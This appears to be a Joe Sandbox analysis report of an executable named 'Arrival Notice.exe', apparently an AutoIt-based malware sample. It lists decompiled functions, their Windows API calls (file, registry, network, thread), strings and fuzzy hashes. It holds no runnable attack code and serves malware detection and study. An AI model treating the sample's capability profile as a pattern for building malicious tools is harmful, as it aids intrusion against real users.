Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
String ID: crts
API String ID: 586820018-3724388283
Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4

Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Arrival Notice.exe,0040F545,C:\Users\user\Desktop\Arrival Notice.exe,004A90E8,C:\Users\user\Desktop\Arrival Notice.exe,?,0040F545), ref: 0041013C

lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
MoveFileW.KERNEL32(?,?), ref: 0044BC3F
_wcscat.LIBCMT ref: 0044BCAF
_wcslen.LIBCMT ref: 0044BCBB
_wcslen.LIBCMT ref: 0044BCD1
SHFileOperationW.SHELL32(?), ref: 0044BD17

Strings

\*.*, xrefs: 0044BCA9

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
String ID: \*.*
API String ID: 2326526234-1173974218
Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98

Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C

_wcslen.LIBCMT ref: 004335F2
GetFileAttributesW.KERNEL32(?), ref: 0043361C
GetLastError.KERNEL32 ref: 0043362B
CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
_wcsrchr.LIBCMT ref: 00433666

Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7

Strings

\, xrefs: 004335FE

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
String ID: \
API String ID: 321622961-2967466578
Opcode ID: 8546d23a8c82eb956732e680471f06bdad33b1bbbc9f0c28737d2518fddb1d69
Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
Opcode Fuzzy Hash: 8546d23a8c82eb956732e680471f06bdad33b1bbbc9f0c28737d2518fddb1d69
Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9

Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0044C7F0
__wcsnicmp.LIBCMT ref: 0044C8AE

Strings

#notrayicon, xrefs: 0044C7EA
#requireadmin, xrefs: 0044C8A8
#OnAutoItStartRegister, xrefs: 0044C810

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: f7e1481b40c6ecf3049f237ff01212b51241ebf6b13818ea7d03055555a8b88c
Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
Opcode Fuzzy Hash: f7e1481b40c6ecf3049f237ff01212b51241ebf6b13818ea7d03055555a8b88c
Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9

Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
__lock.LIBCMT ref: 00417981

Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5

InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
__lock.LIBCMT ref: 004179A2
___addlocaleref.LIBCMT ref: 004179C0

Strings

KERNEL32.DLL, xrefs: 00417948
pI, xrefs: 004179B5

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL$pI
API String ID: 637971194-197072765
Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D

Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004682B8

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

_memmove.LIBCMT ref: 00468319
_memmove.LIBCMT ref: 0046834A
_memmove.LIBCMT ref: 004683A6
_memmove.LIBCMT ref: 00468438
_memmove.LIBCMT ref: 0046845F

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove$_malloc
String ID:
API String ID: 1938898002-0
Opcode ID: fdff623136200eae9aa9e71cee04e345f824e4a9840053947a11f9c92b048ded
Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
Opcode Fuzzy Hash: fdff623136200eae9aa9e71cee04e345f824e4a9840053947a11f9c92b048ded
Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9

Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
_memmove.LIBCMT ref: 0044B555
_memmove.LIBCMT ref: 0044B578
LeaveCriticalSection.KERNEL32(?), ref: 0044B587
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
String ID:
API String ID: 2737351978-0
Opcode ID: dabd869e6285a95d13f2c7c4e530d0ff130a55ee5e8c2b39387b3ad523f30327
Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
Opcode Fuzzy Hash: dabd869e6285a95d13f2c7c4e530d0ff130a55ee5e8c2b39387b3ad523f30327
Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58

Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0041523A
__calloc_crt.LIBCMT ref: 00415246
__getptd.LIBCMT ref: 00415253
CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
_free.LIBCMT ref: 0041529E
__dosmaperr.LIBCMT ref: 004152A9

Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 3638380555-0
Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD

Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0046C96E

Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0046CA98
Null Object assignment in FOR..IN loop, xrefs: 0046C8ED, 0046CA5D, 0046CA79, 0046CB45

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Variant$Copy$ClearErrorInitLast
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 3207048006-625585964
Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5

Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00465559

Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661

inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
gethostbyname.WSOCK32(?), ref: 004655A6
GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
_memmove.LIBCMT ref: 004656CA
GlobalFree.KERNEL32(00000000), ref: 0046575C
WSACleanup.WSOCK32 ref: 00465762

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
String ID:
API String ID: 2945290962-0
Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A

Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000F), ref: 00440527
MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
String ID:
API String ID: 1457242333-0
Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54

Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ConnectRegistry_memmove_wcslen
String ID:
API String ID: 15295421-0
Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A

Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

APIs

Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193

_wcstok.LIBCMT ref: 004675B2

Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE

_wcscpy.LIBCMT ref: 00467641
GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
_wcslen.LIBCMT ref: 00467793
_wcslen.LIBCMT ref: 004677BD

Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8

GetSaveFileNameW.COMDLG32(00000058), ref: 00467807

Strings

X, xrefs: 00467696

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
String ID: X
API String ID: 780548581-3081909835
Opcode ID: ba2598fd82336fdc0df6ef34c67e2225155fba26d6e83463ec18bec81c28bceb
Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
Opcode Fuzzy Hash: ba2598fd82336fdc0df6ef34c67e2225155fba26d6e83463ec18bec81c28bceb
Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A

Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON

Download Yara Rule

APIs

Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266

Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
CloseFigure.GDI32(?), ref: 0044751F
SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
String ID:
API String ID: 4082120231-0
Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5

Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
RegCloseKey.ADVAPI32(?), ref: 0046B49D

Memory Dump Source

